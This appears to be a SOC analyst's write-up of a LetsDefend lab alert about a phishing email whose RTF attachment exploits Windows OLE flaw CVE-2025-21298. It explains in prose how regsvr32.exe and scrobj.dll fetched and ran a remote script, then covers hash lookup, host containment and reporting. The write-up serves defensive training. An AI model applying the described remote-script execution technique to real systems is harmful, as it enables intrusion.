Associated Vulnerability
Description
We are expected to investigate a critical alert reporting a Windows OLE zero-click RCE exploitation (CVE-2025-21298) delivered via a malicious RTF attachment.
Readme
# LetsDefend-SOC336-Windows-OLE-Zero-Click-RCE-Exploitation-Detected-CVE-2025-21298-
We are expected to investigate a critical alert reporting a Windows OLE zero-click RCE exploitation (CVE-2025-21298) delivered via a malicious RTF attachment.
## Investigation of the alert from LetsDefend
<img width="1380" height="1080" alt="Image" src="https://github.com/user-attachments/assets/f1137667-286f-460e-bce8-e86d54839888" /><br><br>
<p align="justify"> On 4 February 2025, at 16:18, a security alert was triggered following the receipt of an email by Austin @ letsdefend.io. The message originated from projectmanagement @ pm.me and included an attachment. The attached file was immediately flagged as malicious by the organisation’s security monitoring systems. This detection indicates that the attachment likely contained harmful content. </p>
## Email sent to Austin
<p align="justify"> This section investigates the project management email identified within the inbuilt email security system. The aim is to understand the nature of the email and the potential threats faced by the user. </p>
<p align="justify"> Upon examination, it is apparent that the email in question is malicious and designed as a phishing attempt. The email delivers a weaponised Rich Text Format (RTF) file, which is crafted to exploit a known vulnerability in Windows Object Linking and Embedding (OLE). </p>
<p align="justify"> The main objective of this attack is to achieve remote code execution on the target system. By exploiting the Windows OLE vulnerability, the attacker seeks to gain initial access to the system or potentially deliver additional payloads, increasing the risk to the recipient. </p>
<img width="800" height="800" alt="Image" src="https://github.com/user-attachments/assets/15802c1d-b5a1-4e8f-b4d8-fe73ff6f7956" />
<img width="800" height="800" alt="Image" src="https://github.com/user-attachments/assets/cc829f37-72cc-4aea-a3de-9efdbed6b9d9" />
---
<p align="justify"> The flagging of the IP address by these independent sources indicates a high likelihood of its involvement in suspicious or harmful operations. This consensus between security tools strengthens the case for treating the IP address as a potential threat within the environment. </p>
<img width="800" height="800" alt="Image" src="https://github.com/user-attachments/assets/df322745-d20d-4335-bcfd-6883cf895952" />
<img width="800" height="800" alt="Image" src="https://github.com/user-attachments/assets/14266f0e-7bad-4b94-ab3c-66dae851f19d" />
## Tracing Malicious Command Execution on Austin’s System
The command execution indicates that regsvr32.exe, a legitimate Windows utility, was leveraged to fetch and run a remote script from the attacker's side. The script was executed via the scrobj.dll library, a method frequently employed in fileless malware attacks, where malicious code runs directly in memory to evade conventional file-based detection mechanisms.
<img width="800" height="800" alt="Image" src="https://github.com/user-attachments/assets/741271ad-6a03-4d6a-84db-089acd31e4bd" />
Upon further examination, it has been determined that the script was downloaded from Austin's endpoint, indicating that script.sct was allowed to be managed from a remote server.
<img width="800" height="800" alt="Image" src="https://github.com/user-attachments/assets/b3dae015-cb02-4c23-9d31-f787ea70df04" />
## Hash on VirusTotal
I extended my analysis by examining the hash linked to the RTF file, which provided clear evidence that it was a malicious file. This hash had been flagged multiple times and identified by various security vendors, confirming its repeated use in malicious activity.
<img width="800" height="800" alt="Image" src="https://github.com/user-attachments/assets/5220b9be-b064-4752-a06f-fd49d25591af" />
## Austin's computer contained
I proactively took the initiative to contain Austin's device in order to prevent any further damage or potential security risks. Additionally. This prompt action helped to minimise the impact and maintain the safety of the network.
<img width="800" height="800" alt="Image" src="https://github.com/user-attachments/assets/70cba92b-02df-4724-8754-9f107146dd5b" />
## Final Report
Upon completion of my investigation, I concluded that the file in question, or the malware associated with it, posed a significant threat. The analysis confirmed that the software was indeed harmful and required immediate attention.
<img width="800" height="800" alt="Image" src="https://github.com/user-attachments/assets/8e304bc3-3b87-4468-9885-e33fde484739" />
<img width="800" height="800" alt="Image" src="https://github.com/user-attachments/assets/567713aa-9428-4d22-ad0c-64cb2c9d96b0" />
<img width="800" height="800" alt="Image" src="https://github.com/user-attachments/assets/b6894549-f02f-4865-9539-d8279097cbc7" />
## My notes
Afterwards, I documented my lessons learned from the incident for future reference and ensured all details regarding the malicious C2 attack were thoroughly communicated.
<img width="700" height="700" alt="Image" src="https://github.com/user-attachments/assets/56652cd6-273c-4cf9-9d7e-b65edb3f461d" />
<img width="700" height="700" alt="Image" src="https://github.com/user-attachments/assets/8e0ccc39-f3e3-4057-98a3-fc9abbe5a687" />
<img width="700" height="700" alt="Image" src="https://github.com/user-attachments/assets/11acace1-a0e5-4ea9-977e-a5de290cf3c2" />
<img width="700" height="700" alt="Image" src="https://github.com/user-attachments/assets/0c9af64a-fd02-4765-b215-b21c7d39b8cc" />
<img width="700" height="700" alt="Image" src="https://github.com/user-attachments/assets/c3391805-4984-438d-961b-5cb99162e302" />
Thank you very much for taking the time to read this!
Your feedback would be greatly valued and appreciated.
File Snapshot
[4.0K] /data/pocs/47da445fe2fcd425d01a75a268c8c9b30684098f
└── [5.7K] README.md
1 directory, 1 file
Remarks
1. It is advised to access via the original source first.
2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →